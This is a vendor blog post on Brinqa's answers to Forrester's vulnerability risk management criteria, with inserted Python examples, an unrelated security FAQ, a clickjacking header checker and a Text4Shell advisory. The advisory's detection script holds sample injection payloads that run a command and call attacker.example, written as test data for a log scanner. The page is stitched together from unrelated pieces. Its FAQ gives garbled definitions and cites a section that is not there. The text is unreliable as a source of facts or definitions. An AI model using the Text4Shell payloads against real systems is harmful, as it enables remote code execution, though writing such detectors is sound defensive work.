How Brinqa addresses the technical capabilities outlined in the 2019 Forrester Wave™: Vulnerability Risk Management study
October 18, 2019 by Syed Abdur

Brinqa has been named as a ‘Contender’ in the Forrester Wave™: Vulnerability Risk Management study released in Q4 2019. This is Brinqa’s first placement in this annual study conducted by Forrester to evaluate the competitive landscape of this crucial cybersecurity field. While we may not entirely agree with the methodology used, we are grateful and appreciative of the opportunity to participate in this study. We also commend Forrester for their efforts to reshape the traditional vulnerability scanning market to better reflect modern vulnerability risk management programs.

The analyst team has done an excellent job of outlining the critical product capabilities used to compare vendors in this space. Practitioners should look to these criteria not only as they evaluate vendors but also as they assess the effectiveness and maturity of their existing Vulnerability (Risk) Management processes. Read on to learn how we at Brinqa recommend organizations interpret and implement these critical capabilities for effective vulnerability risk management. Please note that this does not, in any way, represent Forrester’s position on these criteria.

Vulnerability Enumeration

Vulnerability enumeration capabilities determine how accurately, efficiently, and completely a VRM program identifies and catalogues the vulnerabilities and weaknesses in an organization’s IT infrastructure. As each enterprise IT environment is unique, organizations should focus on ensuring that all significant components of their infrastructure are covered and accounted for.

Brinqa implements this function by utilizing our vast collection of integrations to the leading vulnerability scanning and assessment products. We take a vendor-agnostic approach that allows our customers to leverage the tools that best suit their environment and scanning requirements. This means providing the most comprehensive integrations with security tools for each important facet of the IT infrastructure:

  • Networks — BeyondTrust, Digital Defense, OpenVAS, Qualys, Rapid7, Tenable, Tripwire, VulnDB
  • Applications — Acunetix, BurpSuite, Checkmarx, Contrast Security, Fortify, IBM AppScan, Netsparker, Qualys WAS, Rapid7 Appspider, Sonatype, Synopsys, Veracode, Whitehat, Whitesource
  • Cloud — AlertLogic, Amazon Inspector, Prisma Public Cloud
  • Containers — AquaSecurity, Twistlock
  • Configurations — Microsoft SCCM, Qualys PC, Tripwire Enterprise
  • Mobile — NowSecure
  • Bug Bounty — BugCrowd, Synack
  • Penetration Testing — Generic Flat File, Direct-to-database

However, effective vulnerability enumeration is about more than just collecting vulnerabilities. To handle real-world scenarios (scanner replacement, separate scanners for internal vs. external assets, M&A activity, passive scanning, deduplication, false positives), organizations need advanced data management capabilities. The Brinqa solution allows organizations to normalize vulnerability data from disparate assessment tools to a common, standardized ontology. This is essential for implementing consistent vulnerability risk management practices across the entire scope of the program. The solution enables configurable scoping so that organizations can focus on the most critical infrastructure components and vulnerabilities first, and then gradually expand their program. In the case of overlapping scanning or assessment tools, the solution provides features to de-duplicate and coalesce vulnerability records from multiple sources.
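As an added illustration of the normalization, scoping and de-duplication step (example code, not Brinqa's): two constructed scanner exports with different field layouts are mapped onto one finding schema, filtered to in-scope domains, checked against a false-positive suppression list, and coalesced so that one weakness reported by both tools becomes a single record. The field names, export layouts and CVE-style ids are assumptions.

```python
"""Normalize, scope and de-duplicate findings from two overlapping scanners.
Added example, not Brinqa's code; both export layouts are constructed."""
from dataclasses import dataclass, field
from datetime import date

# Constructed exports: a hypothetical network scanner (A) and a second tool (B)
# that both report web01, plus an out-of-scope lab host seen only by A.
SCANNER_A = [
    {"ip": "10.0.1.5", "hostname": "web01.corp.example", "cve": "CVE-EXAMPLE-0001",
     "port": 443, "proto": "tcp", "severity": "High", "first_seen": "2019-09-01"},
    {"ip": "10.0.1.5", "hostname": "web01.corp.example", "cve": "CVE-EXAMPLE-0002",
     "port": 22, "proto": "tcp", "severity": "Medium", "first_seen": "2019-09-03"},
    {"ip": "10.0.9.9", "hostname": "lab-box.test.example", "cve": "CVE-EXAMPLE-0003",
     "port": 80, "proto": "tcp", "severity": "Low", "first_seen": "2019-09-04"},
]
SCANNER_B = [
    {"asset": "WEB01.CORP.EXAMPLE", "address": "10.0.1.5", "vuln_id": "CVE-EXAMPLE-0001",
     "service": "443/tcp", "risk": 5, "detected": "2019-08-20"},
    {"asset": "WEB01.CORP.EXAMPLE", "address": "10.0.1.5", "vuln_id": "CVE-EXAMPLE-0004",
     "service": "8080/tcp", "risk": 2, "detected": "2019-09-10"},
]

SEVERITY_ORDER = ["Low", "Medium", "High", "Critical"]          # common scale
RISK_TO_SEVERITY = {5: "Critical", 4: "High", 3: "Medium", 2: "Low", 1: "Low"}


@dataclass
class Finding:
    """The common ontology every scanner record is mapped onto."""
    host: str
    ip: str
    cve: str
    port: int
    proto: str
    severity: str
    first_seen: date
    sources: list = field(default_factory=list)

    def key(self):
        """Identity used to coalesce the same weakness seen by several tools."""
        return (self.host, self.cve, self.port, self.proto)


def from_scanner_a(rec):
    return Finding(rec["hostname"].lower(), rec["ip"], rec["cve"], rec["port"],
                   rec["proto"], rec["severity"],
                   date.fromisoformat(rec["first_seen"]), ["scanner_a"])


def from_scanner_b(rec):
    port, proto = rec["service"].split("/")
    return Finding(rec["asset"].lower(), rec["address"], rec["vuln_id"], int(port),
                   proto, RISK_TO_SEVERITY[rec["risk"]],
                   date.fromisoformat(rec["detected"]), ["scanner_b"])


def in_scope(f, scope_domains):
    """Configurable scoping: keep only hosts under the program's current domains."""
    return any(f.host == d or f.host.endswith("." + d) for d in scope_domains)


def normalize(scope_domains=("corp.example",), suppress=()):
    """Map both exports to Finding, apply scope and suppression, then coalesce.

    suppress is a set of (host, cve) pairs confirmed as false positives.
    """
    candidates = [from_scanner_a(r) for r in SCANNER_A] + \
                 [from_scanner_b(r) for r in SCANNER_B]
    merged = {}
    for f in candidates:
        if not in_scope(f, scope_domains) or (f.host, f.cve) in suppress:
            continue
        k = f.key()
        if k not in merged:
            merged[k] = f
            continue
        kept = merged[k]
        kept.sources = sorted(set(kept.sources) | set(f.sources))
        kept.first_seen = min(kept.first_seen, f.first_seen)   # earliest detection wins
        if SEVERITY_ORDER.index(f.severity) > SEVERITY_ORDER.index(kept.severity):
            kept.severity = f.severity                         # highest severity wins
    return sorted(merged.values(), key=lambda f: (f.host, f.cve))


if __name__ == "__main__":
    for f in normalize():
        print(f.host, f.cve, f.port, f.severity, f.first_seen, f.sources)
```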

Digital Footprinting

Digital footprinting can help organizations gain an understanding about which of their assets are publicly accessible and which are relatively protected behind firewalls and DMZs. This classification should be established, if possible, and used to inform determinations of asset criticality, ownership, escalation chains, SLAs, and other operational considerations.

Brinqa Vulnerability Risk Service implements this function through integrations with asset discovery services like BitSight and incorporates an organization’s digital footprint (including determination of publicly accessible assets) into VRM processes. The real power of the solution is in operationalizing an organization’s digital footprint towards better asset management and hygiene.

Rogue (or unknown) assets can be organized and monitored through rules that ensure the footprint matches the asset source of truth, and trigger automated tasks and tickets for corrective actions when necessary. By updating in near real time, the digital footprint can be leveraged to determine the existence of new or unmanaged assets, which can then be automatically assigned to the appropriate asset groups or risk owners.

Asset Criticality (or better yet, Asset Management)

An organization’s ability to correctly assign asset criticality directly impacts the accuracy and soundness of risk-based vulnerability prioritization. However, we would argue that asset management (and not just asset criticality) is a crucial function that VRM teams and programs should address with great attention. Effective asset management is accurate (results in an exhaustive inventory of all the assets in the scope of the program), comprehensive (covers every relevant factor of asset identity and usage), and functional (includes criticality, ownership, escalation chains, and all other operational aspects).

Asset Management is likely the least standardized component of VRM programs. Almost every organization represents, classifies, and tracks assets in their own unique way. Further, asset information resides in a variety of systems and programs all across the organization.

Brinqa addresses this unpredictability by

(a) providing a comprehensive asset data model that represents most common technical (type, vendor, network segment, operational status, internal/external, publicly accessible) and business impact (data classification, monetary value, supported business services, compliance requirements, location, data center, business unit) factors, and

(b) providing a completely dynamic, extensible data model (enabled by our graph database backend) so that organizations can easily incorporate any factors that are unique to them.

This information is populated through purpose-built integration with a variety of systems — Asset Discovery (Nmap), CMDB (BMC, Cherwell, HP, ServiceNow), Network Management (RedSeal, InfoBlox), and GRC (Archer). Often this information resides in other programs (data protection, business impact analysis, disaster recovery) or in proprietary systems and is collected using flat file, LDAP, or direct-to-database connectors. The asset criticality calculation is part of the extensible data model and can be modified by administrators to accurately reflect the organization’s IT environment. This ensures complete transparency and control over the determination of asset criticality.

Network Exposure

Accurately determining network exposure can help organizations understand the true structure of their network infrastructure and establish the relationships and dependencies between assets that can be leveraged for attack path analysis. Building this information into the risk analysis model gives organizations a true picture of the risk associated with a vulnerability or asset.

Brinqa Vulnerability Risk Service implements this function through integrations with network management (Cisco, InfoBlox, RedSeal) and CMDB (BMC, Cherwell, HP, ServiceNow) systems to present a complete picture of the network architecture. Network metadata such as network criticality, type (e.g. DMZ), whether a host is leap-froggable or accessible from untrusted networks, and attack path data such as attack depth and downstream risk can be incorporated into the risk prioritization model.

The solution includes an out-of-the-box (OOB) network segmentation model, and assets can be dynamically associated with segments based on IP ranges and other factors. Organizing assets along network segments also gives IT users a perspective of vulnerability risk that aligns with their day-to-day operations.

Vulnerability Severity

The ability to accurately and expeditiously determine and incorporate threat intelligence into risk prioritization can mean the difference between a breach and a secured environment. VRM programs should ensure that factors of exploitability and indicators of compromise are evaluated continuously and there are measures in place to trigger the appropriate workflows if any changes are detected.

Brinqa leverages our vast collection of purpose-built integrations with most common open source and commercial threat intelligence providers (Accenture iDefense, AlienVault, CrowdStrike, Digital Shadows, FireEye, NVD, Recorded Future, Secureworks, Symantec DeepSight Intelligence, TruSTAR) to establish the most accurate view of vulnerability severity. This incorporates factors like exploit availability, weaponization, zero-day, popularity, pervasiveness, and patch availability. The solution gives administrators complete control over how various threat intelligence criteria come together to determine vulnerability severity. Intelligent correlation easily sifts through large volumes of threat intel to identify and incorporate those factors that have an impact on the organization’s unique technology environment.

Risk Based Prioritization

Risk based prioritization brings together all the underlying asset, vulnerability, and threat information to accurately identify and highlight the vulnerabilities that pose the biggest risks to the organization. Risk is inherently subjective, so it’s imperative that VRM programs and teams incorporate in the prioritization process any unique aspects of the organization that have an impact on risk.

Brinqa implements this function by first establishing a customer’s unique Cyber Risk Graph — a real-time representation of infrastructure and apps, delineation of interconnects between assets and to business services, and knowledge of overall cyber risk. This serves as the single, unified view and source of truth that drives an informed, risk-based prioritization of vulnerabilities.

Brinqa Vulnerability Risk Service includes an OOB best-practices-based risk prioritization model that customers can use as is or extend to incorporate any additional factors. The solution does this by giving administrators access to editable Groovy scripts that hold the calculation logic and provide a controlled way to reference the underlying cyber risk graph. This is a common design pattern for software platforms: it brings the benefits of scripting languages like Groovy (simple syntax and semantics, easy to learn and write) to the implementation of powerful customizations without the need to rely on vendor product or service teams.

The flexibility and control provided by the open calculations is key to VRM success in complex and dynamic environments. Enterprise technology environments are often in flux – scope expands, asset types diversify, scanners multiply, threat intel feeds are added, business context factors become relevant. Brinqa’s open data model and risk scoring is critical to our customers’ ability to adapt and continue to deliver effective results in these scenarios. Solutions that provide rigid and prescriptive risk models cannot handle this type of dynamic environment, a big reason why customers choose Brinqa.
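A simplified stand-in for the kind of open risk calculation described above, written in Python rather than Groovy and not Brinqa's own model: the factor weights, tier thresholds, asset records and findings are all constructed. The point it demonstrates is that a lower-CVSS finding on a publicly accessible, business-critical asset with weaponized exploit code outranks a higher-CVSS finding on an internal build host.

```python
"""Risk-based prioritization from asset criticality, vulnerability severity
(CVSS adjusted by threat intelligence) and network exposure.
Added example in Python as a stand-in for editable scoring logic; all weights
and records are constructed, not Brinqa's model."""

# Constructed asset records using the business-impact and network factors the post lists.
ASSETS = {
    "web01": {"data_classification": "confidential", "business_services": ["payments"],
              "publicly_accessible": True, "segment": "DMZ", "compliance": ["PCI"]},
    "build03": {"data_classification": "internal", "business_services": [],
                "publicly_accessible": False, "segment": "corp", "compliance": []},
}

# Constructed findings with the threat-intel flags the post names; ids are placeholders.
FINDINGS = [
    {"id": "F1", "asset": "web01", "cve": "CVE-EXAMPLE-0001", "cvss": 7.5,
     "exploit_available": True, "weaponized": True, "patch_available": True},
    {"id": "F2", "asset": "build03", "cve": "CVE-EXAMPLE-0005", "cvss": 9.8,
     "exploit_available": False, "weaponized": False, "patch_available": True},
    {"id": "F3", "asset": "web01", "cve": "CVE-EXAMPLE-0006", "cvss": 5.3,
     "exploit_available": False, "weaponized": False, "patch_available": False},
]

CLASSIFICATION_WEIGHT = {"public": 1.0, "internal": 2.0, "confidential": 3.0, "restricted": 4.0}


def asset_criticality(asset):
    """Business-impact factors combined into a 1.0 .. 5.0 score (weights are assumptions)."""
    score = CLASSIFICATION_WEIGHT[asset["data_classification"]]
    score += 1.0 if asset["business_services"] else 0.0   # supports a business service
    score += 0.5 if asset["compliance"] else 0.0          # carries a compliance requirement
    return min(score, 5.0)


def vulnerability_severity(finding):
    """CVSS scaled by threat intelligence: weaponized code outweighs a bare PoC,
    and a missing vendor patch keeps the exposure window open-ended."""
    mult = 1.0
    if finding["weaponized"]:
        mult += 0.5
    elif finding["exploit_available"]:
        mult += 0.25
    if not finding["patch_available"]:
        mult += 0.1
    return min(finding["cvss"] * mult, 10.0)


def network_exposure(asset):
    """Exposure multiplier: internet-facing > DMZ > internal segment."""
    if asset["publicly_accessible"]:
        return 1.5
    if asset["segment"] == "DMZ":
        return 1.25
    return 1.0


def risk_score(finding, assets=ASSETS):
    asset = assets[finding["asset"]]
    return round(vulnerability_severity(finding) * asset_criticality(asset)
                 * network_exposure(asset), 2)


def prioritize(findings=FINDINGS, assets=ASSETS):
    """Rank findings by risk, highest first, so the top of the list is what to fix first."""
    return sorted(((risk_score(f, assets), f["id"]) for f in findings), reverse=True)


if __name__ == "__main__":
    for score, fid in prioritize():
        print(f"{fid}: risk {score}")
```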

Metrics & Reporting

Comprehensive metrics and reporting capabilities are crucial to VRM programs’ ability to effectively and intuitively engage and inform all the varied stakeholders across IT, security, and business at the appropriate instant in the risk lifecycle. The ability to visually communicate key risk and performance indicators through powerful metrics and reports is crucial to program success. Organizations must empower and encourage stakeholders to develop and communicate the metrics and reports that matter to them.

Brinqa Vulnerability Risk Service includes an extensive library of risk and performance metrics and reports. The solution includes a sophisticated, BI-like analytics interface that is used to build all the views, reports and dashboards in the solution. This gives users complete access to the underlying graph data model and can be used to create powerful, self-service metrics and reports with the ability to configure nearly every aspect of visualization (layout, color schemes, metrics calculations, data representation).

Role Based Management

Role-based management of access, permissions, and data is necessary to ensure that the varied stakeholders in the VRM process can work together without any risk of data compromise.

Brinqa delivers fine-grained access controls within the platform that are configurable from the UI. Default roles such as Configurator, Risk Analyst and Security Administrator are available out of the box, but most customers use default and custom roles to reflect the uniqueness of their organization. Large customers segment and define access levels based on responsibilities (executive/business owner/security), geography, business unit and regulatory restrictions.

Limiting access to data makes it easier for individuals to own, manage and communicate risk responsibilities through a subset of vulnerability data, risk scores, metrics and reports. Role management capabilities and access controls are also used by enterprises and MSSPs to segregate data/knowledge to limit who can see what on a need-to-know basis, and to control who is empowered to customize the vulnerability risk solution. Brinqa also enables UI components such as menus and dashboards to be customized based on users’ roles.

Remediation Management

While the Forrester Wave study does a good job of outlining the most important considerations for VRM programs, a crucial scoring criterion that is conspicuously missing is remediation management. While better prioritization can highlight the most important vulnerabilities from the backlog, better remediation management can significantly reduce the overhead associated with risk remediation and improve remediation effectiveness, efficiency, and consistency. Organizations should look to improve their vulnerability remediation practices and replace ad hoc decisions with well thought out, repeatable policies that leverage automation to achieve predictable results.

Brinqa implements a rule-based ticketing mechanism for automated remediation management. Brinqa customers are encouraged to formulate policies that govern how tickets should be created and managed. These rules are run automatically when new vulnerabilities are discovered. The rules allow vulnerabilities to be grouped together based on common criteria, thereby significantly reducing the volume of tickets being created (and the overhead associated with managing them). Rule configuration also allows ownership and SLAs to be set and enforced dynamically, ensuring consistency of remediation efforts.

The Brinqa solution includes native ticket lifecycle management, but it’s more common for Brinqa customers to utilize an external ITSM tool for managing ticket lifecycles. This is achieved through bi-directional integrations with leading ITSM systems (Jira, BMC Remedy, CA Service Desk, Cherwell, ServiceNow). Similar to ticket creation rules, ticket closure rules can be set up to validate risk remediation effectiveness and close tickets automatically.
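The ticket creation and closure rules described in this section, as an added example (not Brinqa's code; the findings, owners, risk tiers and SLA days are constructed): findings above a risk threshold are grouped into one ticket per owner and CVE, the ticket's SLA follows its riskiest member, and a closure rule closes a ticket only when none of its findings reappear in the latest scan, so partial remediation keeps it open.

```python
"""Rule-based ticket creation and closure for remediation management.
Added example, not Brinqa's code: findings, owners, tiers and SLA days are constructed."""
from collections import defaultdict
from datetime import date, timedelta

# Constructed open findings that have already been risk-scored; owner comes from the asset.
FINDINGS = [
    {"id": "F1", "asset": "web01", "cve": "CVE-EXAMPLE-0001", "owner": "web-team", "risk": 67.5},
    {"id": "F2", "asset": "web02", "cve": "CVE-EXAMPLE-0001", "owner": "web-team", "risk": 60.0},
    {"id": "F3", "asset": "web01", "cve": "CVE-EXAMPLE-0006", "owner": "web-team", "risk": 39.4},
    {"id": "F4", "asset": "build03", "cve": "CVE-EXAMPLE-0005", "owner": "ci-team", "risk": 19.6},
]

# Constructed policy: SLA in days per risk tier.
SLA_DAYS = {"critical": 7, "high": 30, "medium": 90, "low": 180}


def risk_tier(score):
    """Map a risk score onto the policy's tiers (thresholds are assumptions)."""
    if score >= 60:
        return "critical"
    if score >= 35:
        return "high"
    if score >= 15:
        return "medium"
    return "low"


def create_tickets(findings, opened=date(2019, 10, 18), min_risk=15.0):
    """Creation rule: one ticket per (owner, CVE); tier and due date follow the
    riskiest member, and findings below min_risk are not ticketed at all."""
    groups = defaultdict(list)
    for f in findings:
        if f["risk"] >= min_risk:
            groups[(f["owner"], f["cve"])].append(f)
    tickets = []
    for (owner, cve), members in sorted(groups.items()):
        tier = risk_tier(max(m["risk"] for m in members))
        tickets.append({
            "owner": owner,
            "cve": cve,
            "tier": tier,
            "findings": sorted(m["id"] for m in members),
            "assets": sorted({m["asset"] for m in members}),
            "opened": opened,
            "due": opened + timedelta(days=SLA_DAYS[tier]),
            "status": "open",
        })
    return tickets


def apply_closure_rule(tickets, still_open_ids):
    """Closure rule: close a ticket only when none of its findings were
    detected in the latest scan (still_open_ids); one lingering finding keeps it open."""
    for t in tickets:
        if t["status"] == "open" and not any(i in still_open_ids for i in t["findings"]):
            t["status"] = "closed"
    return tickets


def overdue(tickets, today):
    """Open tickets whose SLA has elapsed, for escalation reporting."""
    return [t for t in tickets if t["status"] == "open" and t["due"] < today]


if __name__ == "__main__":
    tickets = create_tickets(FINDINGS)
    for t in tickets:
        print(t["owner"], t["cve"], t["tier"], t["findings"], "due", t["due"])
    # Latest scan still sees F2, so the CVE-EXAMPLE-0001 ticket must stay open.
    apply_closure_rule(tickets, {"F2", "F3", "F4"})
    print([t["status"] for t in tickets])
```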


Access the full 2019 Forrester Wave™: Vulnerability Risk Management report here.


You can perform penetration testing only after you’ve completed development. Pen testing reveals highly possible attack scenarios, but little coverage of code. What does "exploitable" mean? Exploitable in cybersecurity means anything that can be exploited for selfish or unethical reasons, especially commercially. Attackers seek exploitable vulnerabilities, meaning those with both an exploit method and a path that allows exploiting. What is penetration testing in a production environment? Penetration testing in a production environment enables testing the entire solution and granting an accurate picture of what happens during operation. It also provides a view into which assets are most attractive to an attacker and measures when the security tools you implemented detect the attacks. How vital is front-end web security? Front-end web security is as vital as backend code security. The entrance to your website is open to the world and is complex, completes more, and is consequently more potent than it used to be. Increased complexity and performance expand the number of attack surfaces. What are front-end security best practices? Front-end security best practices begin with a good security policy. Make security part of the development process by using a framework that automatically considers it. For example, you can reduce browser feature access and prevent clickjacking attacks by disabling iframe embedding. You also need to be judicious when adding third-party services. What is a DAST screening tool? DAST tools execute code and then inspect it at runtime to detect possible security vulnerabilities. What is dynamic security training? Dynamic security training is a hands-on approach to educating and informing people on cybersecurity risks and threats that require entire team member engagement. Dynamic security training gives users an idea about hazards they might encounter, how to handle them, and how in the future to mitigate those risks.
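The front-end best practice above is to prevent clickjacking by refusing to let other sites embed your pages in an iframe. The check below is an added example, not code from this page or from Brinqa: given a response's headers, it decides whether a browser would allow cross-origin framing, following the browser rule that a Content-Security-Policy frame-ancestors directive takes precedence over X-Frame-Options and that, with neither header, framing is allowed. The sample responses are constructed for the example, and the function names are the example's own.

```python
"""Decide from response headers whether a page can be framed by another site.

Added example (not code from the page or from Brinqa). A page that a
third-party origin can load in an <iframe> is the precondition for a
clickjacking attack, so this is the check a DAST-style scan or a header
audit wants to run on every response.
"""
from typing import Dict, List, Optional


def _header(headers: Dict[str, str], name: str) -> Optional[str]:
    """Case-insensitive header lookup (header names are case-insensitive)."""
    for key, value in headers.items():
        if key.lower() == name.lower():
            return value
    return None


def frame_ancestors(csp: str) -> Optional[List[str]]:
    """Return the source list of the frame-ancestors directive, or None if
    the policy has no such directive. Quotes around 'self'/'none' are removed."""
    for directive in csp.split(";"):
        parts = directive.strip().split()
        if parts and parts[0].lower() == "frame-ancestors":
            return [p.strip("'").lower() for p in parts[1:]]
    return None


def framable_by_third_party(headers: Dict[str, str]) -> bool:
    """True when a page served with these headers can be embedded by an
    arbitrary other origin."""
    csp = _header(headers, "Content-Security-Policy")
    if csp is not None:
        ancestors = frame_ancestors(csp)
        if ancestors is not None:
            # CSP frame-ancestors wins over X-Frame-Options. An empty list
            # means 'none'; 'self' and explicit origins exclude arbitrary
            # sites; only '*' or a bare scheme opens the page to anyone.
            return any(a in ("*", "https:", "http:") for a in ancestors)
    xfo = _header(headers, "X-Frame-Options")
    if xfo is not None:
        value = xfo.strip().upper()
        if value in ("DENY", "SAMEORIGIN"):
            return False
        # ALLOW-FROM is obsolete and unknown values are ignored by current
        # browsers, so anything else leaves the page framable.
        return True
    # No header at all: browsers allow framing by default.
    return True


def audit(responses: Dict[str, Dict[str, str]]) -> List[str]:
    """Names of the responses that a third-party site could frame, sorted."""
    return sorted(name for name, hdrs in responses.items()
                  if framable_by_third_party(hdrs))


# Constructed sample responses for the example (name -> headers).
CONSTRUCTED_RESPONSES = {
    "login": {"Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'",
              "X-Frame-Options": "DENY"},
    "legacy": {"X-Frame-Options": "SAMEORIGIN"},
    "widget": {"Content-Security-Policy": "frame-ancestors *"},
    "no-headers": {},
    "allow-from": {"X-Frame-Options": "ALLOW-FROM https://partner.example"},
    "csp-wins": {"Content-Security-Policy": "frame-ancestors 'self'",
                 "X-Frame-Options": "ALLOW-FROM https://partner.example"},
}

if __name__ == "__main__":
    for name in audit(CONSTRUCTED_RESPONSES):
        print(f"{name}: framable by third parties (clickjacking exposure)")
```

The "allow-from" case is the one teams most often get wrong: the header is present, so a naive check passes it, but no current browser honours ALLOW-FROM, so the page is as exposed as one with no header at all.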

November 9, 2022
CVE-2022-42889 Text4Shell

On 2022-10-13, the Apache Security Team disclosed a critical vulnerability, CVE-2022-42889, affecting the popular Apache Commons Text library. The vulnerability is popularly named "Text4Shell" and, when exploited, can allow an unauthenticated attacker to execute arbitrary code on the vulnerable asset. It has been assigned a CVSSv3 score of 9.8/10. Apache Commons Text versions 1.5 through 1.9 are affected; the issue is patched in Apache Commons Text 1.10.0 and later.

Apache Commons Text is a widely used low-level library for performing various text operations, such as escaping, calculating string differences, and substituting placeholders in text with values looked up through interpolators. When the string substitution feature is used, some of the available interpolators can trigger network access or code execution. This is intended behaviour, but it also means that an application that includes user input in the string passed to the substitution without properly sanitizing it would allow an attacker to trigger those interpolators.

Brinqa Response:

Brinqa does include the affected versions in parts of its application, but we do not use untrusted strings as input, and we are not vulnerable based on the information we have at this time. We are updating the affected version to 1.10 where this library is used.

Affected products:
Brinqa 5.x
Brinqa 10.x

More updates to come as we get further information. If you have any questions or concerns, please contact us at
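The software composition analysis section earlier on this page and this advisory come down to the same two questions for a vulnerability management team: which assets carry Apache Commons Text 1.5 through 1.9, and is anyone sending substitution lookups at our applications. The Python below is an added example, not Brinqa's code or the Apache project's. It flags affected versions from Maven-style coordinate lines (the `group:artifact:packaging:version:scope` form printed by `mvn dependency:list`, or plain `group:artifact:version`) and scans request log lines for the `script`, `dns` and `url` lookups, which are the three the Apache advisory identifies as able to run code or reach the network (this page does not list them by name). The dependency lines and log lines are constructed for the example, and the version comparison drops qualifiers such as `-SNAPSHOT`, which a real SCA tool would handle properly.

```python
"""CVE-2022-42889 (Text4Shell) exposure check.

Added example, not code from Brinqa or from the Apache project. Two checks:
  1. flag Apache Commons Text dependencies in the affected range
     (1.5 <= version < 1.10.0) from Maven-style coordinate lines;
  2. scan web request log lines for the script/dns/url lookups, URL-decoding
     first so %24%7Bscript%3A is caught as well as the literal ${script:.
Matching lookups in inputs is a detection aid, not a substitute for upgrading.
"""
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

AFFECTED_MIN = (1, 5)     # first affected release
FIXED_VERSION = (1, 10)   # 1.10.0 and later are fixed


def parse_version(text: str) -> Tuple[int, ...]:
    """'1.10.0' -> (1, 10, 0). Anything after '-' (e.g. '-SNAPSHOT') is
    dropped for this example."""
    core = text.split("-", 1)[0]
    return tuple(int(part) for part in core.split("."))


def parse_coordinate(line: str) -> Optional[Tuple[str, str, str]]:
    """Accept 'group:artifact:version' or Maven's
    'group:artifact:packaging:version:scope'; return (group, artifact, version)."""
    parts = line.strip().split(":")
    if len(parts) == 3:
        return parts[0], parts[1], parts[2]
    if len(parts) == 5:
        return parts[0], parts[1], parts[3]
    return None


def is_affected(line: str) -> bool:
    """True when the line names Apache Commons Text 1.5 <= version < 1.10."""
    coord = parse_coordinate(line)
    if coord is None:
        return False
    group, artifact, version = coord
    if (group, artifact) != ("org.apache.commons", "commons-text"):
        return False
    # Tuple comparison: (1, 9) < (1, 10) < (1, 10, 0), so 1.10.0 is clean.
    return AFFECTED_MIN <= parse_version(version) < FIXED_VERSION


def vulnerable_dependencies(lines: List[str]) -> List[str]:
    """Subset of coordinate lines that fall in the affected range."""
    return [ln.strip() for ln in lines if is_affected(ln)]


# Only these lookups can execute code or touch the network via ${prefix:...}.
DANGEROUS_LOOKUPS = re.compile(r"\$\{\s*(script|dns|url)\s*:", re.IGNORECASE)


def dangerous_lookups(raw: str) -> List[str]:
    """Lookup names found in one request line after URL-decoding."""
    return [m.lower() for m in DANGEROUS_LOOKUPS.findall(unquote(raw))]


def suspicious_requests(log_lines: List[str]) -> List[Tuple[str, List[str]]]:
    """(line, lookups) pairs for every log line carrying a dangerous lookup."""
    hits = []
    for line in log_lines:
        found = dangerous_lookups(line)
        if found:
            hits.append((line, found))
    return hits


# Constructed inputs for the example (not real inventory or traffic).
CONSTRUCTED_DEPENDENCIES = [
    "org.apache.commons:commons-text:jar:1.9:compile",
    "org.apache.commons:commons-lang3:jar:3.12.0:compile",
    "org.apache.commons:commons-text:1.10.0",
    "org.apache.commons:commons-text:jar:1.4:compile",
]

CONSTRUCTED_LOG = [
    '10.0.0.5 - - "GET /search?q=${script:javascript:java.lang.Runtime.getRuntime().exec(\'id\')} HTTP/1.1" 200',
    '10.0.0.6 - - "GET /search?q=%24%7Bdns%3Aaddress%7Cattacker.example%7D HTTP/1.1" 200',
    '10.0.0.7 - - "GET /search?q=hello+world HTTP/1.1" 200',
    '10.0.0.8 - - "POST /api/v1/notes HTTP/1.1" 500 body=${url:UTF-8:http://attacker.example/x}',
]

if __name__ == "__main__":
    for dep in vulnerable_dependencies(CONSTRUCTED_DEPENDENCIES):
        print("AFFECTED:", dep)
    for line, found in suspicious_requests(CONSTRUCTED_LOG):
        print("LOOKUP", found, "in:", line)
```

The dependency check answers the asset-inventory question the advisory's "Affected products" list answers for Brinqa's own software; the log scan is only worth running against applications that actually pass request data into a StringSubstitutor, since the literal `${...}` text is harmless to everything else.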